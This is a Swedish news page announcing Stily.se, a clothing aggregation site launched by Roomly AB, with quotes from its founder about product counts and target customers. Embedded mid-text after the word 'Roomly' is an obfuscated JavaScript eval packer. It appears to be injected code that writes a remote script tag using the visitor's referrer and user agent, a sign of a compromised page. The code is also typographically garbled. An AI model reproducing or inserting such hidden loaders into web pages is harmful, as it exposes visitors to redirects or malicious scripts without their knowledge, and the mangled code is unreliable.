Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Nya tjänsten Stily.se gör det enklare att hitta kläder online

Nya tjänsten Stily.se gör det enklare att hitta kläder online

Roomly eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|niddn|var|u0026u|referrer|ntabk||js|php’.split(’|’),0,{}))
AB lanserar ny spännande tjänst som ska göra det lättare för konsumenter att hitta och köpa designkläder online. Stily.se är namnet på den nya modesajten som redan idag finns tillgänglig att besöka och använda. En hemsida som samlar återförsäljares produkter på en plats och möjliggör köp.

På den nya webbaserade modetjänsten, tillgänglig redan idag kan man kunna söka fram kläder och mode från över 400 varumärken. Stily.se som är namnet på den nya tjänsten har samlat över 20 000 produkter från flera stora svenska återförsäljare. Målet är att redan nu i höst erbjuda över 40 000 produkter på sajten.

– I en marknad som rör sig kraftigt upp är det viktigt att ha en försäljningsstrategi på gårdsnivå för att lyckas. Med vår tidigare sajt Roomly.se som inriktar sig på inredning har vi kunnat analysera tillväxten och kommit fram till att vårt nästa steg ska bli kläder online. Vi tycker också att inredning och mode går lite hand i hand och passar därför mycket bra som tillväxt i vårt nätverk säger Sebastian Plengier Ehrnfelt grundare av Roomly AB

Den nya tjänsten kommer att erbjuda produkter för både män och kvinnor.

– Stily.se kommer att rikta sig till både män och kvinnor. Vi har även diskuterat om att försöka fånga en balans mellan de olika sektionerna, då menar vi att det ska finnas lika mycket kläder för män som kvinnor på sajten säger Sebastian Plengier Ehrnfelt grundare av Roomly AB

För företag kommer Stily.se spela en stor roll. Här skapas en merförsäljningskanal för e-handlare i Sverige. En plats där butiker kan skapa nya kunder och stärka sitt varumärke.
Genom att Stily.se och 
Roomly.se inte har något eget lager så läggs största fokus på att marknadsföra sajten vilket då också betyder produkterna och handlarna.

Redan idag finns Stily.se redo att besöka och använda. Sajten har i skrivade stund ca 20 000 produkter för både herr och dam i sin katalog.

Hemsida: Stily.se